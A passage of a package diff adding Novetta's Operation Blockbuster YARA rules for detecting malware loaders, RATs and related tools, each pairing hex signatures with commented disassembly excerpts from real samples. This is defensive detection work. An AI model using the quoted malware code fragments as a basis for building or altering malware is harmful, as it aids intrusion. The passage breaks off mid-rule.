+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/LimaBravo.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/LimaBravo.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/LimaBravo.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/LimaBravo.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,27 @@
+import "pe"
+
+rule LimaBravo
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "Mwsagent.dll"
+
+	strings:
+	/*
+		83 C4 34        add     esp, 34h
+		83 FD 0A        cmp     ebp, 0Ah
+		5D              pop     ebp
+		5B              pop     ebx
+		7E 12           jle     short loc_1000106F
+		57              push    edi             ; Src
+		C6 07 4D        mov     byte ptr [edi], 4Dh
+		C6 47 01 5A     mov     byte ptr [edi+1], 5Ah
+		E8 97 01 00 00  call    ManualImageLoad
+	*/
+
+	$a = {83 ?? 34 83 ?? 0A [0-2] 7E ?? 5? C6 ?? 4D C6 [2] 5A E8}
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/LimaCharlie.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/LimaCharlie.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/LimaCharlie.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/LimaCharlie.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,46 @@
+import "pe"
+
+rule LimaCharlie
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source_x86 = "6ee6ae79ee1502a11ece81e971a54f189a271be9ec700101a2bd7a21198b94c7"
+		Source_x64 = "90ace24eb132c776a6d5bb0451437db21e84601495a2165d75f520af637e71e8"
+
+	strings:
+		$misspelling = "Defualt Sleep = %d" wide
+
+	/*
+		FF 76 74           push    dword ptr [esi+74h]
+		59                 pop     ecx
+		50                 push    eax
+		8F 86 48 01 00 00  pop     dword ptr [esi+148h]
+		85 C0              test    eax, eax
+		51                 push    ecx
+		8F 86 44 01 00 00  pop     dword ptr [esi+144h]
+		75 3D              jnz     short loc_100035F3
+		F6 46 56 01        test    byte ptr [esi+56h], 1
+		74 0A              jz      short loc_100035C6
+	*/
+
+	$x86 = {FF ?? 74 5? 5? 8F ?? 48 01 00 00 85 C0 5? 8F ?? 44 01 00 00 75 ?? F6 [2] 01 74}
+
+	/*
+		48 8B 4B 70           mov     rcx, [rbx+70h]
+		48 89 8B 60 01 00 00  mov     [rbx+160h], rcx
+		48 89 83 68 01 00 00  mov     [rbx+168h], rax
+		48 85 C0              test    rax, rax
+		75 35                 jnz     short loc_180002372
+		F6 43 56 01           test    byte ptr [rbx+56h], 1
+		74 07                 jz      short loc_18000234A
+	*/
+
+	$x64 = {48 [2] 70 48 [2] 60 01 00 00 48 [2] 68 01 00 00 48 85 C0 75 ?? F6 [2] 01 74}
+		
+	condition:
+		$x86 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $x64 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $misspelling
+		
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/LimaDelta.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/LimaDelta.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/LimaDelta.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/LimaDelta.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,47 @@
+import "pe"
+
+rule LimaDelta
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "81e6118a6d8bf8994ce93f940059217481bfd15f2757c48c589983a6af54cfcc"
+
+	strings:
+	/*
+		8B 69 FC           mov     ebp, [ecx-4]
+		83 C1 10           add     ecx, 10h
+		81 F5 6D 3A 71 58  xor     ebp, 58713A6Dh
+		89 2A              mov     [edx], ebp
+		33 ED              xor     ebp, ebp
+		66 8B 69 F0        mov     bp, [ecx-10h]
+		89 6A 04           mov     [edx+4], ebp
+		83 C2 08           add     edx, 8
+		4F                 dec     edi
+		75 E3              jnz     short loc_4026CE
+	*/
+
+	$fileDecoder = {8B ?? ?? 83 ?? 10 81 ?? 6D 3A 71 58 89 ?? 33 ?? 66 ?? ?? F0 89 ?? 04 83 ?? 08 4? 75}
+		
+	/*
+		66 81 BC 24 A0 00 00 00 BB 01  cmp     [esp+98h+arg_4], 1BBh
+		74 21                          jz      short loc_401BD7
+		FF 15 58 30 40 00              call    ds:rand
+		99                             cdq
+		B9 32 00 00 00                 mov     ecx, 32h
+		F7 F9                          idiv    ecx
+		8B DA                          mov     ebx, edx
+		8D 54 24 5E                    lea     edx, [esp+98h+var_3A]
+		53                             push    ebx             ; dwSize
+		52                             push    edx             ; pvBuffer
+		E8 3F FB FF FF                 call    GenerateRandomBuffer
+		83 C4 08                       add     esp, 8
+		83 C3 46                       add     ebx, 46h
+	*/
+
+	$authenicateBufferGen = {BB 01 74 ?? FF 15 [4] 99 B? 32 00 00 00 F7 ?? 8B ?? 8D [3] 5? 5? E8 [4] 83 C4 08 83 ?? 46}
+	
+	condition:
+		$authenicateBufferGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $fileDecoder in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/mastersig remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/mastersig
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/mastersig	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/mastersig	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,72 @@
+// Glue file for all of the different yara sigs for easier scanning
+//
+//  copyright 2015 Novetta Solutions
+//	author = Novetta Threat Research & Interdiction Group - trig@novetta.com
+// Content distribution
+include "HotelAlfa.yara"
+
+// Installers
+include "IndiaAlfa.yara"
+include "IndiaBravo.yara"
+include "IndiaCharlie.yara"
+include "IndiaDelta.yara"
+include "IndiaEcho.yara"
+
+include "IndiaGolf.yara"
+include "IndiaHotel.yara"
+include "IndiaJuliett.yara"
+include "IndiaWhiskey.yara"
+
+// Keyloggers
+include "KiloAlfa.yara"
+
+// Loaders
+include "LimaAlfa.yara"
+include "LimaBravo.yara"
+include "LimaCharlie.yara"
+include "LimaDelta.yara"
+
+// Proxies
+include "PapaAlfa.yara"
+
+// RATs
+include "RomeoAlfa.yara"
+include "RomeoBravo.yara"
+include "RomeoCharlie.yara"
+include "RomeoDelta.yara"
+include "RomeoEcho.yara"
+include "RomeoFoxtrot.yara"
+include "RomeoGolf.yara"
+include "RomeoHotel.yara"
+include "RomeoWhiskey.yara"
+
+// Spreaders
+include "SierraAlfa.yara"
+include "SierraBravo.yara"
+include "SierraCharlie.yara"
+include "SierraJuliettMikeOne.yara"
+include "SierraJuliettMikeTwo.yara"
+
+// Tools
+include "TangoAlfa.yara"
+include "TangoBravo.yara"
+
+// Uninstallers
+include "UniformAlfa.yara"
+include "UniformJuliett.yara"
+
+// Wipers
+include "WhiskeyAlfa.yara"
+include "WhiskeyBravo.yara"
+include "WhiskeyCharlie.yara"
+include "WhiskeyDelta.yara"
+
+
+// feature detection signatures  -- these are error prone
+include "general.yara"
+include "sharedcode.yara"
+include "suicidescripts.yara"
+
+// CERT signatures -- low confidence in these
+include "cert_wiper.yara"
+
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/PapaAlfa.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/PapaAlfa.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/PapaAlfa.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/PapaAlfa.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,15 @@
+rule PapaAlfa
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$ = "pmsconfig.msi" wide
+		$ = "pmslog.msi" wide
+		$ = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d"
+		$ = "CreatP2P Thread" wide
+		$ = "GreatP2P Thread" wide
+	condition:
+		3 of them
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoAlfa.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoAlfa.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoAlfa.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoAlfa.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,48 @@
+import "pe"
+
+rule RomeoAlfa
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "fba0b8bdc1be44d100ac31b864830fcc9d056f1f5ab5486384e09bd088256dd0.file2.bin"
+
+	strings:
+	/*
+		68 C4 94 41 00     push    offset a0_0_0_0 ; "0.0.0.0"
+		56                 push    esi             ; wchar_t *
+		E8 1C B4 00 00     call    _wcscpy
+		83 C6 28           add     esi, 28h
+		83 C4 08           add     esp, 8
+		81 FE E8 CD 41 00  cmp     esi, offset unk_41CDE8
+		7C E7              jl      short loc_4039DA
+	*/
+
+	$zeroIPLoader = {68 [4] 56 E8 [4] 83 C6 28 83 C4 08 81 FE [4] 7C E?}
+		
+
+
+		// push    esi                              
+		// mov     esi, [esp+4+a1]                  
+		// test    esi, esi                         
+		// jle     short loc_403FEB                 
+		// push    edi                              
+		// mov     edi, ds:Sleep                    
+		// push    0EA60h          ; dwMilliseconds 
+		// call    edi ; Sleep                      
+		// dec     esi                              
+		// jnz     short loc_403FE0                 
+		// pop     edi                              
+		// pop     esi                              
+		// retn                                     
+		$sleeper  = {5? 8B [3] 85 ?? 7E ?? 5? 8B 3D [4]  68 [4] FF ??  4? 75 ??	5? 5? C3 }
+			
+		$xercesc = "xercesc"
+		
+	condition:
+		($sleeper in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $zeroIPLoader in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)))
+		and not $xercesc
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoBravo.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoBravo.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoBravo.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoBravo.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,37 @@
+import "pe"
+
+rule RomeoBravo
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "95314a7af76ec36cfba1a02b67c2b81526a04e3b2f9b8fb9b383ffcbcc5a3d9b"
+
+	strings:
+	/*
+		E8 D9 FC FF FF  call    SendData
+		83 C4 10        add     esp, 10h
+		85 C0           test    eax, eax
+		74 0A           jz      short loc_10003FE8
+		B8 02 00 00 00  mov     eax, 2
+		5E              pop     esi
+		83 C4 18        add     esp, 18h
+		C3              retn
+		6A 78           push    78h             ; dwTimeout
+		6A 01           push    1               ; fDecode
+		8D 54 24 18     lea     edx, [esp+24h+recvData]
+		6A 0C           push    0Ch             ; dwLength
+		52              push    edx             ; pvBuffer
+		56              push    esi             ; skt
+		E8 57 FD FF FF  call    RecvData
+		83 C4 14        add     esp, 14h
+		85 C0           test    eax, eax
+		74 0A           jz      short loc_1000400A
+		B8 02 00 00 00  mov     eax, 2
+	*/
+
+	$a = {E8 [4] 83 C4 10 85 C0 74 ?? B? 02 00 00 00 5? 83 C4 18 C3 6A 78 6A 01 8D [3] 6A 0C 5? 5? E8 [4] 83 C4 14 85 C0 74 ?? B8 02 00 00 00}
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoCharlie.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoCharlie.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoCharlie.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoCharlie.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,57 @@
+import "pe"
+
+rule RomeoCharlie
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "a82108ef7115931b3fbe1fab99448c4139e22feda27c1b1d29325710671154e8"
+
+	strings:
+		$auth1 = "Success - Accept Auth"
+		$auth2 = "Fail - Accept Auth"
+
+	/*
+		81 E3 FF FF 00 00  and     ebx, 0FFFFh
+		8B EB              mov     ebp, ebx
+		57                 push    edi
+		C1 EE 10           shr     esi, 10h
+		81 E5 FF FF 00 00  and     ebp, 0FFFFh
+		8B FE              mov     edi, esi
+		8B C5              mov     eax, ebp
+		81 E7 FF FF 00 00  and     edi, 0FFFFh
+		C1 E0 10           shl     eax, 10h
+		6A 00              push    0               ; _DWORD
+		0B C7              or      eax, edi
+		6A 00              push    0               ; _DWORD
+		50                 push    eax             ; _DWORD
+		68 10 14 11 71     push    offset sub_71111410; _DWORD
+		6A 00              push    0               ; _DWORD
+		6A 00              push    0               ; _DWORD
+		FF 15 5C 8E 12 71  call    CreateThread_0
+		C1 E7 10           shl     edi, 10h
+	*/
+
+	$startupRelayThreads = {81 ?? FF FF 00 00 8B ?? 5? C1 ?? 10 81 ?? FF FF 00 00 8B ?? 8B ?? 81 ?? FF FF 00 00 C1 ?? 10 6A 00 0B ?? 6A 00 	50 68 [4] 6A 00 6A 00 FF 15 [4] C1 ?? 10 }
+
+	/*
+	source: 641808833ad34f2e5143001c8147d779dbfd2a80a80ce0cfc81474d422882adb
+		25 00 20 00 00     and     eax, 2000h
+		3D 00 20 00 00     cmp     eax, 2000h
+		0F 94 C1           setz    cl
+		81 E2 80 00 00 00  and     edx, 80h
+		33 C0              xor     eax, eax
+		80 FA 80           cmp     dl, 80h
+		0F 94 C0           setz    al
+		03 C8              add     ecx, eax
+		33 D2              xor     edx, edx
+		83 F9 01           cmp     ecx, 1
+	*/
+
+	$crypto = {2? 00 20 00 00 3? 00 20 00 00 0F [2] 81 ?? 80 00 00 00 33 ?? 80 ?? 80 0F [2] 03 ?? 33 ?? 83 ?? 01 }
+
+	condition:
+		all of ($auth*) 
+		or $startupRelayThreads in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $crypto in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoDelta.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoDelta.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoDelta.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoDelta.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,33 @@
+import "pe"
+
+rule RomeoDelta
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "1df2af99fb3b6e31067b06df07b96d0ed0632f85111541a416da9ceda709237c"
+
+	strings:
+	/*
+		E8 78 00 00 00  call    GenerateRandomBuffer
+		33 C0           xor     eax, eax
+		8A 4C 04 04     mov     cl, [esp+eax+24h+buffer]
+		80 E9 22        sub     cl, 22h
+		80 F1 AD        xor     cl, 0ADh
+		88 4C 04 04     mov     [esp+eax+24h+buffer], cl
+		40              inc     eax
+		83 F8 10        cmp     eax, 10h
+		7C EC           jl      short loc_1000117A
+		6A 01           push    1               ; fEncode
+		8D 54 24 08     lea     edx, [esp+28h+buffer]
+		6A 10           push    10h             ; dwDataLength
+		52              push    edx             ; pvData
+		8B CB           mov     ecx, ebx        ; this
+		E8 A2 00 00 00  call    CSocket__Send
+	*/
+
+	$loginInit = { E8 [4] 33 C0 8A [3] 80 [2] 80 [2] 88 [3] 40 83 F8 10 7C ?? 6A 01 8D [3] 6A 10 5? 8B CB E8	}
+
+	condition:
+		$loginInit in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoEcho.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoEcho.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoEcho.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoEcho.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,18 @@
+import "pe"
+
+rule RomeoEcho
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$ = "%s %-20s %10lu %s"
+		$ = "_quit"
+		$ = "_exe"
+		$ = "_put"
+		$ = "_get"
+
+	condition:
+		all of them
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoFoxtrot_mod.yara.error remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoFoxtrot_mod.yara.error
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoFoxtrot_mod.yara.error	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoFoxtrot_mod.yara.error	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,57 @@
+// This rule has been modified by @mmorenog @yarules to fix some errors
+
+import "pe"
+
+
+rule RomeoFoxtrot
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "dropped.bin"
+		Source_relativeCalls = "635bebe95671336865f8a546f06bf67ab836ea35795581d8a473ef2cd5ff4a7f"
+
+	strings:
+	/*
+		C7 44 24 08 01 00 00 00  mov     [esp+128h+argp], 1
+		8B 8C 24 30 01 00 00     mov     ecx, dword ptr [esp+128h+wPort]
+		C7 44 24 04 00 00 20 03  mov     dword ptr [esp+128h+optval], 3200000h
+		51                       push    ecx             ; hostshort
+		89 44 24 1C              mov     dword ptr [esp+12Ch+name.sin_addr.S_un], eax
+		FF 15 8C 01 FF 7E        call    ds:htons
+		6A 06                    push    6               ; protocol
+		6A 01                    push    1               ; type
+		6A 02                    push    2               ; af
+		66 89 44 24 22           mov     [esp+134h+name.sin_port], ax
+		66 C7 44 24 20 02 00     mov     [esp+134h+name.sin_family], 2
+		FF 15 84 01 FF 7E        call    ds:socket								     <--- this could be a relative call in some variants
+		83 F8 FF                 cmp     eax, 0FFFFFFFFh
+		89 46 04                 mov     [esi+4], eax
+		0F 84 AD 00 00 00        jz      loc_7EFE4C63
+		57                       push    edi
+		8B 3D 88 01 FF 7E        mov     edi, ds:setsockopt            <---- this line is missing when relative calls are used
+		8D 54 24 08              lea     edx, [esp+12Ch+optval]
+		6A 04                    push    4               ; optlen
+		52                       push    edx             ; optval
+		68 02 10 00 00           push    1002h           ; optname
+		68 FF FF 00 00           push    0FFFFh          ; level
+		50                       push    eax             ; s
+		FF D7                    call    edi ; setsockopt								<--- this could be a relative call in some variants
+		8B 4E 04                 mov     ecx, [esi+4]
+		8D 44 24 08              lea     eax, [esp+12Ch+optval]
+		6A 04                    push    4               ; optlen
+		50                       push    eax             ; optval
+		68 01 10 00 00           push    1001h           ; optname
+		68 FF FF 00 00           push    0FFFFh          ; level
+		51                       push    ecx             ; s
+		FF D7                    call    edi ; setsockopt								<--- this could be a relative call in some variants
+	*/
+
+		//$connect = {C7 [3] 01 00 00 00 8B [6] C7 [3] 00 00 20 03 5? 89 [3] (FF 15 [4] | E8 [4]) 6A 06 6A 01 6A 02 66 [4] 66 [4] 02 00 (FF 15 [4] | E8 [4]) 83 F8 FF 89 [2] 0F 84 [4] [0-7] 8D [3] 6A 04 5? 68 02 10 00 00 68 FF FF 00 00 5? (FF D? | E8 [4]) 8B [2] 8D [3] 6A 04 5? 68 01 10 00 00 68 FF FF 00 00 5? (FF D? | E8 [4])}
+		$connect = {C7 [3] 01 00 00 00 8B [6] C7 [3] 00 00 20 03 5? 89 [3] FF 15 [4] 6A 06 6A 01 6A 02 66 [4] 66 [4] 02 00 FF 15 E8 [4] 83 F8 FF 89 [2] 0F 84 [4] [0-7] 8D [3] 6A 04 5? 68 02 10 00 00 68 FF FF 00 00 5? FF D? 8B [2] 8D [3] 6A 04 5? 68 01 10 00 00 68 FF FF 00 00 5? FF D?}
+		$response = "RESPONSE 200 OK!!!"
+
+	condition:
+		($challenge and $response) or 
+		$connect in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoGolf_mod.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoGolf_mod.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoGolf_mod.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoGolf_mod.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,36 @@
+// This rule has been modified by @mmorenog
+// Original->$idGen = {FF 15 [4] 50 E8 [4] 83 C4 04 E8 [4] C1 ?? 10 89 [2] E8 [4] 01 [2] E8 [4] C1 ?? 10 89 [2] E8 [4]}
+// Final -> $idGen = {FF 15 [4] 50 E8 [4] 83 C4 04 E8 [4] C1 ?? 10 89 [2] E8 [4] 01 [2] E8 [4] C1 ?? 10 89 [2] E8 [4] ?? ?? ?? }
+
+
+import "pe"
+
+rule RomeoGolf
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "7322d6b9328a9c708518c99b03a4ed3aa6ba943d7b439f6b1925e6d52a1828fe"
+
+	strings:
+	/*
+		FF 15 70 80 01 10  call    ds:GetTickCount
+		50                 push    eax             ; unsigned int
+		E8 80 93 00 00     call    _srand
+		83 C4 04           add     esp, 4
+		E8 85 93 00 00     call    _rand
+		C1 E0 10           shl     eax, 10h
+		89 46 0C           mov     [esi+0Ch], eax
+		E8 7A 93 00 00     call    _rand
+		01 46 0C           add     [esi+0Ch], eax
+		E8 72 93 00 00     call    _rand
+		C1 E0 10           shl     eax, 10h
+		89 46 08           mov     [esi+8], eax
+		E8 67 93 00 00     call    _rand
+		01 46 08           add     [esi+8], eax
+	*/
+
+	$idGen = {FF 15 [4] 50 E8 [4] 83 C4 04 E8 [4] C1 ?? 10 89 [2] E8 [4] 01 [2] E8 [4] C1 ?? 10 89 [2] E8 [4] ?? ?? ?? }
+	condition:
+		$idGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoHotel.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoHotel.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoHotel.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoHotel.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,51 @@
+import "pe"
+
+rule RomeoHotel
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source_64 = "440cb3f6dd07e2f9e3d3614fd23d3863ecfc08b463b0b327eedf08504f838c90"
+		Source_diskSpace = "1b1496f8f35d32a93c7f16ebff6e9b560a158cc6fce061491f91bc9f43ef5be4"
+
+	strings:
+	/*
+		E8 D3 C7 00 00  call    rand
+		44 8B ED        mov     r13d, ebp
+		44 8B E0        mov     r12d, eax
+		B8 1F 85 EB 51  mov     eax, 51EB851Fh
+		48 8B FD        mov     rdi, rbp
+		41 F7 EC        imul    r12d
+		C1 FA 05        sar     edx, 5
+		8B CA           mov     ecx, edx
+		C1 E9 1F        shr     ecx, 1Fh
+		03 D1           add     edx, ecx
+		6B D2 64        imul    edx, 64h
+		44 2B E2        sub     r12d, edx
+		41 83 C4 3C     add     r12d, 3Ch
+	*/
+
+	$randBuff64 = {E8 [4] 44 [2] 44 [2] B? 1F 85 EB 51 48 [2] 41 [2] C1 ?? 05 8B ?? C1 ?? 1F 03 ??	6B ?? 64 44 [2]	41 [2] 3C}
+		
+	/*
+		FF 15 40 70 01 10     call    ds:GetDiskFreeSpaceExA
+		85 C0                 test    eax, eax
+		74 34                 jz      short loc_10005072
+		8B 84 24 20 01 00 00  mov     eax, [esp+11Ch+arg_0]
+		6A 00                 push    0
+		99                    cdq
+		68 00 00 10 00        push    100000h
+		52                    push    edx
+		50                    push    eax
+		E8 4C 7C 00 00        call    __allmul
+	*/
+
+	$diskSpace = {FF 15 [4] 85 C0 74 ?? 8B [6] 6A 00 99 68 00 00 10 00 5? 5? E8}
+		
+	$winst = "winsta0\\default" wide		// this limits the overlap with RomeoGolf
+
+	condition:
+		$randBuff64 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or ($diskSpace in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		and $winst)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoWhiskey.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoWhiskey.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/RomeoWhiskey.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/RomeoWhiskey.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,66 @@
+// rules specific to the winsec malware families
+import "pe"
+
+rule RomeoWhiskey_Two
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "a8d88714f0bc643e76163d1b8972565e78a159292d45a8218d0ad0754c8f561d"
+
+	strings:
+	/*
+		FF 15 78 A2 00 10  call    GetTickCount_9
+		66 8B C8           mov     cx, ax
+
+		// the next op is a mov or a push/pop depending on the code version
+		53                 push    ebx
+		8F 45 F4           pop     dword ptr [ebp-0Ch]
+		//or
+		89 5D F4           mov     dword ptr [ebp+var_C], ebx
+		
+		
+		66 81 F1 40 1C     xor     cx, 1C40h
+		66 D1 E9           shr     cx, 1
+		81 C1 E0 56 00 00  add     ecx, 56E0h
+		0F B7 C9           movzx   ecx, cx
+		0F B7 C0           movzx   eax, ax
+		81 F1 30 32 00 00  xor     ecx, 3230h
+		C1 E0 10           shl     eax, 10h
+		0B C8              or      ecx, eax
+	*/
+
+	$a = {FF 15 [4] 66 8B C8 [3-4] 	66 81 F1 40 1C 	66 D1 E9 81 C1 E0 56 00 00 0F B7 C9 0F B7 C0 81 F1 30 32 00 00 	C1 E0 10 0B C8 }
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+
+
+rule RomeoWhiskey_One
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
